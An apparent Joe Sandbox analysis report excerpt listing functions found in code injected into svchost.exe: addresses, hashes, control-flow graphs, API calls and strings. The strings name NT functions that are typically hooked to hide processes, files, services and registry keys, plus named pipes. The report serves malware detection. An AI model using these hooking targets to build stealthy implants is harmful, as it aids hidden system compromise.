                                                                          • Instruction ID: 3fed60f760ab3f32da691e52dbf4ab303354c7f47779857e17f14048716fb99a
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: A1711C36311F1886EB119FA6E860AD923F6FB85B89F005111DE4EA7F69EF34C485C750
                                                                          Function 00000195DD5C12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: 495f4bd1ccfcfb5c7fe309b38a271ae55a6fce5f460d804d76d8676db85ca4e3
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 30515B36201F8886EB51CFA6E46879A77E2F789F89F044124DA4957B18DF3CC04ACB10
                                                                          Function 00000195DD5C1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 0a117424bb8ec17e06fa24497d1726645dd05d6d29179111a98c9b800477247c
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: D1318274142E4EE0FB17EFE9E871AE463E3B714398FC450139449B2E759E78824AD760
                                                                          Function 00000195DD596910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 211 195dd596910-195dd596916 212 195dd596951-195dd59695b 211->212 213 195dd596918-195dd59691b 211->213 214 195dd596a78-195dd596a8d 212->214 215 195dd59691d-195dd596920 213->215 216 195dd596945-195dd596984 call 195dd596fc0 213->216 220 195dd596a8f 214->220 221 195dd596a9c-195dd596ab6 call 195dd596e54 214->221 218 195dd596922-195dd596925 215->218 219 195dd596938 __scrt_dllmain_crt_thread_attach 215->219 234 195dd596a52 216->234 235 195dd59698a-195dd59699f call 195dd596e54 216->235 226 195dd596931-195dd596936 call 195dd596f04 218->226 227 195dd596927-195dd596930 218->227 224 195dd59693d-195dd596944 219->224 222 195dd596a91-195dd596a9b 220->222 232 195dd596aef-195dd596b20 call 195dd597190 221->232 233 195dd596ab8-195dd596aed call 195dd596f7c call 195dd596e1c call 195dd597318 call 195dd597130 call 195dd597154 call 195dd596fac 221->233 226->224 243 195dd596b22-195dd596b28 232->243 244 195dd596b31-195dd596b37 232->244 233->222 238 195dd596a54-195dd596a69 234->238 246 195dd5969a5-195dd5969b6 call 195dd596ec4 235->246 247 195dd596a6a-195dd596a77 call 195dd597190 235->247 243->244 248 195dd596b2a-195dd596b2c 243->248 249 195dd596b7e-195dd596b94 call 195dd59268c 244->249 250 195dd596b39-195dd596b43 244->250 261 195dd5969b8-195dd5969dc call 195dd5972dc call 195dd596e0c call 195dd596e38 call 195dd59ac0c 246->261 262 195dd596a07-195dd596a11 call 195dd597130 246->262 247->214 255 195dd596c1f-195dd596c2c 248->255 268 195dd596b96-195dd596b98 249->268 269 195dd596bcc-195dd596bce 249->269 256 195dd596b4f-195dd596b5d call 195dd5a5780 250->256 257 195dd596b45-195dd596b4d 250->257 264 195dd596b63-195dd596b78 call 195dd596910 256->264 278 195dd596c15-195dd596c1d 256->278 257->264 261->262 314 195dd5969de-195dd5969e5 __scrt_dllmain_after_initialize_c 261->314 262->234 282 195dd596a13-195dd596a1f call 195dd597180 262->282 264->249 264->278 268->269 275 195dd596b9a-195dd596bbc call 195dd59268c call 195dd596a78 268->275 276 195dd596bd0-195dd596bd3 269->276 277 195dd596bd5-195dd596bea call 195dd596910 269->277 275->269 308 195dd596bbe-195dd596bc6 call 195dd5a5780 275->308 276->277 276->278 277->278 296 195dd596bec-195dd596bf6 277->296 278->255 301 195dd596a21-195dd596a2b call 195dd597098 282->301 302 195dd596a45-195dd596a50 282->302 298 195dd596c01-195dd596c11 call 195dd5a5780 296->298 299 195dd596bf8-195dd596bff 296->299 298->278 299->278 301->302 313 195dd596a2d-195dd596a3b 301->313 302->238 308->269 313->302 314->262 315 195dd5969e7-195dd596a04 call 195dd59abc8 314->315 315->262
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: ceb190c1bc5cb76a39468d0dcf2336ec5ebfdbce9e152840d3fa6cc9d2bd33da
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 6381CE72704E41C6FB52ABE594713D926E3EB96B80F548025EA0577F96EF38C84A8F00
                                                                          Function 00000195DD5CCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000195DD5CCE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEBC
                                                                          • SetLastError.KERNEL32 ref: 00000195DD5CCED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000195DD5CECCC,?,?,?,?,00000195DD5CBF9F,?,?,?,?,?,00000195DD5C7AB0), ref: 00000195DD5CCF2C
                                                                            • Part of subcall function 00000195DD5CD6CC: HeapAlloc.KERNEL32 ref: 00000195DD5CD721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF54
                                                                            • Part of subcall function 00000195DD5CD744: HeapFree.KERNEL32 ref: 00000195DD5CD75A
                                                                            • Part of subcall function 00000195DD5CD744: GetLastError.KERNEL32 ref: 00000195DD5CD764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: 5deeaa700c7bca527ac3e0ef52b0542e40d86773dc9f6c8a69b3fdc468513023
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: B5412034303E4C82FB6BA7EE59753F913C35B857B4F140724A936E6ED6DE2894818700
                                                                          Function 00000195DD5C2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: ef64e02e287f94d0d9415c348699ab4dc805c8a96bd9a803ab77d90ce42376f4
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: 09217932614B4483FB118BA5F4647AA73E2F789BA5F544215EA5953FA8CF3CC14ACB00
                                                                          Function 00000195DD599944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 469 195dd599944-195dd5999ac call 195dd59a814 472 195dd5999b2-195dd5999b5 469->472 473 195dd599e13-195dd599e1b call 195dd59bb48 469->473 472->473 474 195dd5999bb-195dd5999c1 472->474 476 195dd599a90-195dd599aa2 474->476 477 195dd5999c7-195dd5999cb 474->477 479 195dd599d63-195dd599d67 476->479 480 195dd599aa8-195dd599aac 476->480 477->476 481 195dd5999d1-195dd5999dc 477->481 484 195dd599da0-195dd599daa call 195dd598a34 479->484 485 195dd599d69-195dd599d70 479->485 480->479 482 195dd599ab2-195dd599abd 480->482 481->476 483 195dd5999e2-195dd5999e7 481->483 482->479 486 195dd599ac3-195dd599aca 482->486 483->476 487 195dd5999ed-195dd5999f7 call 195dd598a34 483->487 484->473 495 195dd599dac-195dd599dcb call 195dd596d40 484->495 485->473 488 195dd599d76-195dd599d9b call 195dd599e1c 485->488 490 195dd599ad0-195dd599b07 call 195dd598e10 486->490 491 195dd599c94-195dd599ca0 486->491 487->495 503 195dd5999fd-195dd599a28 call 195dd598a34 * 2 call 195dd599124 487->503 488->484 490->491 507 195dd599b0d-195dd599b15 490->507 491->484 496 195dd599ca6-195dd599caa 491->496 500 195dd599cba-195dd599cc2 496->500 501 195dd599cac-195dd599cb8 call 195dd5990e4 496->501 500->484 506 195dd599cc8-195dd599cd5 call 195dd598cb4 500->506 501->500 513 195dd599cdb-195dd599ce3 501->513 535 195dd599a48-195dd599a52 call 195dd598a34 503->535 536 195dd599a2a-195dd599a2e 503->536 506->484 506->513 511 195dd599b19-195dd599b4b 507->511 515 195dd599b51-195dd599b5c 511->515 516 195dd599c87-195dd599c8e 511->516 518 195dd599df6-195dd599e12 call 195dd598a34 * 2 call 195dd59baa8 513->518 519 195dd599ce9-195dd599ced 513->519 515->516 520 195dd599b62-195dd599b7b 515->520 516->491 516->511 518->473 522 195dd599d00 519->522 523 195dd599cef-195dd599cfe call 195dd5990e4 519->523 524 195dd599b81-195dd599bc6 call 195dd5990f8 * 2 520->524 525 195dd599c74-195dd599c79 520->525 528 195dd599d03-195dd599d0d call 195dd59a8ac 522->528 523->528 550 195dd599c04-195dd599c0a 524->550 551 195dd599bc8-195dd599bee call 195dd5990f8 call 195dd59a038 524->551 531 195dd599c84 525->531 528->484 548 195dd599d13-195dd599d61 call 195dd598d44 call 195dd598f50 528->548 531->516 535->476 554 195dd599a54-195dd599a74 call 195dd598a34 * 2 call 195dd59a8ac 535->554 536->535 542 195dd599a30-195dd599a3b 536->542 542->535 547 195dd599a3d-195dd599a42 542->547 547->473 547->535 548->484 558 195dd599c0c-195dd599c10 550->558 559 195dd599c7b 550->559 569 195dd599bf0-195dd599c02 551->569 570 195dd599c15-195dd599c72 call 195dd599870 551->570 575 195dd599a76-195dd599a80 call 195dd59a99c 554->575 576 195dd599a8b 554->576 558->524 563 195dd599c80 559->563 563->531 569->550 569->551 570->563 579 195dd599df0-195dd599df5 call 195dd59baa8 575->579 580 195dd599a86-195dd599def call 195dd5986ac call 195dd59a3f4 call 195dd5988a0 575->580 576->476 579->518 580->579
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: 8578d22811c705561b9a0c63265d0fa22d72dfafe6aec0b6b4f758a2598a20e0
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 3EE18C72604B40CAEB62DBA5D4A03DD7BE2F756B98F142116EE8967F99CB34C191CF00
                                                                          Function 00000195DD5CA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 590 195dd5ca544-195dd5ca5ac call 195dd5cb414 593 195dd5ca5b2-195dd5ca5b5 590->593 594 195dd5caa13-195dd5caa1b call 195dd5cc748 590->594 593->594 595 195dd5ca5bb-195dd5ca5c1 593->595 597 195dd5ca690-195dd5ca6a2 595->597 598 195dd5ca5c7-195dd5ca5cb 595->598 600 195dd5ca963-195dd5ca967 597->600 601 195dd5ca6a8-195dd5ca6ac 597->601 598->597 602 195dd5ca5d1-195dd5ca5dc 598->602 605 195dd5ca9a0-195dd5ca9aa call 195dd5c9634 600->605 606 195dd5ca969-195dd5ca970 600->606 601->600 603 195dd5ca6b2-195dd5ca6bd 601->603 602->597 604 195dd5ca5e2-195dd5ca5e7 602->604 603->600 607 195dd5ca6c3-195dd5ca6ca 603->607 604->597 608 195dd5ca5ed-195dd5ca5f7 call 195dd5c9634 604->608 605->594 619 195dd5ca9ac-195dd5ca9cb call 195dd5c7940 605->619 606->594 609 195dd5ca976-195dd5ca99b call 195dd5caa1c 606->609 611 195dd5ca894-195dd5ca8a0 607->611 612 195dd5ca6d0-195dd5ca707 call 195dd5c9a10 607->612 608->619 623 195dd5ca5fd-195dd5ca628 call 195dd5c9634 * 2 call 195dd5c9d24 608->623 609->605 611->605 616 195dd5ca8a6-195dd5ca8aa 611->616 612->611 628 195dd5ca70d-195dd5ca715 612->628 620 195dd5ca8ba-195dd5ca8c2 616->620 621 195dd5ca8ac-195dd5ca8b8 call 195dd5c9ce4 616->621 620->605 627 195dd5ca8c8-195dd5ca8d5 call 195dd5c98b4 620->627 621->620 634 195dd5ca8db-195dd5ca8e3 621->634 659 195dd5ca62a-195dd5ca62e 623->659 660 195dd5ca648-195dd5ca652 call 195dd5c9634 623->660 627->605 627->634 632 195dd5ca719-195dd5ca74b 628->632 636 195dd5ca751-195dd5ca75c 632->636 637 195dd5ca887-195dd5ca88e 632->637 639 195dd5ca8e9-195dd5ca8ed 634->639 640 195dd5ca9f6-195dd5caa12 call 195dd5c9634 * 2 call 195dd5cc6a8 634->640 636->637 641 195dd5ca762-195dd5ca77b 636->641 637->611 637->632 643 195dd5ca8ef-195dd5ca8fe call 195dd5c9ce4 639->643 644 195dd5ca900 639->644 640->594 645 195dd5ca781-195dd5ca7c6 call 195dd5c9cf8 * 2 641->645 646 195dd5ca874-195dd5ca879 641->646 654 195dd5ca903-195dd5ca90d call 195dd5cb4ac 643->654 644->654 671 195dd5ca804-195dd5ca80a 645->671 672 195dd5ca7c8-195dd5ca7ee call 195dd5c9cf8 call 195dd5cac38 645->672 651 195dd5ca884 646->651 651->637 654->605 668 195dd5ca913-195dd5ca961 call 195dd5c9944 call 195dd5c9b50 654->668 659->660 665 195dd5ca630-195dd5ca63b 659->665 660->597 675 195dd5ca654-195dd5ca674 call 195dd5c9634 * 2 call 195dd5cb4ac 660->675 665->660 667 195dd5ca63d-195dd5ca642 665->667 667->594 667->660 668->605 679 195dd5ca87b 671->679 680 195dd5ca80c-195dd5ca810 671->680 690 195dd5ca7f0-195dd5ca802 672->690 691 195dd5ca815-195dd5ca872 call 195dd5ca470 672->691 696 195dd5ca68b 675->696 697 195dd5ca676-195dd5ca680 call 195dd5cb59c 675->697 684 195dd5ca880 679->684 680->645 684->651 690->671 690->672 691->684 696->597 700 195dd5ca9f0-195dd5ca9f5 call 195dd5cc6a8 697->700 701 195dd5ca686-195dd5ca9ef call 195dd5c92ac call 195dd5caff4 call 195dd5c94a0 697->701 700->640 701->700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                          • Instruction ID: 9c2520efcc87ac771d522e1eb6396a81ecb0ce0daac719ccbdf896b70f129e44
                                                                          • Opcode Fuzzy Hash: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                          • Instruction Fuzzy Hash: 07E18D72606B488AEB32DFA9D4913DD7BE2F745B98F100115EE89A7F99CB35C481CB00
                                                                          Function 00000195DD5CF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                          • Instruction ID: f94411bdc3c5adc3673d068f26baf74004ea3de06b1d5fa0a00e338998d396b5
                                                                          • Opcode Fuzzy Hash: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                          • Instruction Fuzzy Hash: 4741B236313E0492EB17DB9AA8647D623E7BB45BA0F494125DD0AE7F84EE3CC44A8350
                                                                          Function 00000195DD5C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 85125c25dfd785958ae00b37ce84ac9a8513cd9fd1755175fa0b0cf5bc826ac5
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: CC418C33214F88C6E761CFA5E45479A77E2F389B89F048129DA8957B58DF3CC489CB00
                                                                          Function 00000195DD5CD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: b29a2c01b9a529d3d397189201e4ebb9e472c9377beb16884566e216c47c93f0
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: 47112134707A8881FB6A67AF59717E963C35B847F0F1443269839F6EDAEE28C5428700
                                                                          Function 00000195DD5C7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: db17aeae78a532267f4925ec03955f9628ff8aa19b2b3ce37216714fce8ee9dc
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 7281A031602E0F86FB63ABEE98713D967D3AB45780F145415DA05F7F96EB78C8868700
                                                                          Function 00000195DD5C9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                          • Instruction ID: 8d15efdb5329dbd6f8d908350e729aaeb4b7b6a33fa5c2f06519c4c6539ee195
                                                                          • Opcode Fuzzy Hash: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                          • Instruction Fuzzy Hash: 0E31E531213E04D1EF13DBCAA4207D523D6B759BA1F590625DD1EABB98EF38C245C710
                                                                          Function 00000195DD5D3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 900ef7d4bcd6fd2864e51168dc1007f1dfbbe5e213ae5e9ff28ad5abe65b03b1
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 2C11BF32310F4086E7629B96E8643A9B3E1F788FE5F044224EA1A97B94CF78C8058750
                                                                          Function 00000195DD5C3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 42188e63fbb78b0732cb93c59acbf515d5b68af2c84de3977fd9872ca41c66e2
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 38118E36302F4982FF559B95F4242A963F2F749B85F040028DE8953B94EF3DC545C714
                                                                          Function 00000195DD5C5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
